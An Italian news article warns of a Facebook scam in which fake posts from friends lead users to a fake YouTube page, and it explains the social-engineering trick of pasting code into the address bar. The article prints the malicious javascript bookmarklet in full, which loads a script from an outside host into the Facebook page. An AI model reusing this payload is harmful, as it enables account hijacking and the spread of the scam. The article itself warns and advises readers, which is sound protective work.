Video “strani” su Facebook, allarme virus. Come funziona e come reagire - Notizie.it
Video “strani” su Facebook, allarme virus. Come funziona e come reagire
Bari e Puglia

Video “strani” su Facebook, allarme virus. Come funziona e come reagire

Da alcuni giorni su Facebook si sta diffondendo un allarme virus: molti iscritti stanno ricevendo messaggi in bacheca da parte dei propri amici (già infettati) che li esortano a cliccare sul video condiviso.
Il nuovo arrivato altro non è che un finto post di un amico che ci appare sulla bacheca, scritto in un italiano abbastanza credibile, che ci invita a guardare il video in cui noi siamo stati ripresi. Il testo infatti solitamente recita qualcosa del tipo: “Giulia come hai fatto a girare questo video” oppure “Giulia ma come ti hanno ripreso qui” e, oltre al post, vengono aggiunti anche alcuni commenti per rendere il tutto più credibile. Cliccando, infatti, siete indirizzati ad una fasulla pagina di YouTube con un video che sollecita un “controllo sicurezza di Facebook” per essere visibile.
Nello specifico ci viene detto di cliccare nella barra degli indirizzi e premere J
poi di premere CTRL+V (che corrisponde a fare incolla), infatti il “virus” ha preventivamente “copiato” nella clipboard del sistemaoperativo questo codice:
avascript:(a=(b=document).createElement(‘script’)).src=’http://www.cowboysaliensstreaming.com/tag/fb.php’,b.body.appendChild(a);void(0)
Il risultato della J unita a questo codice sarà un comando Javascript, ovvero:
javascript:(a=(b=document).createElement(‘script’)).src=’http://www.cowboysalienss

(in questo modo il “virus” ha fregato eventuali protezioni che impediscono di trasferire javascript nella clipboard)
COSA BISOGNA FARE
GLI ESPERTI consigliano di fare una pulizia generale con ATF Cleaner e cambiare la password del proprio account di Facebook.

© Riproduzione riservata

1 Commento su Video “strani” su Facebook, allarme virus. Come funziona e come reagire

Lascia un commento

L'indirizzo email non sarà pubblicato.


*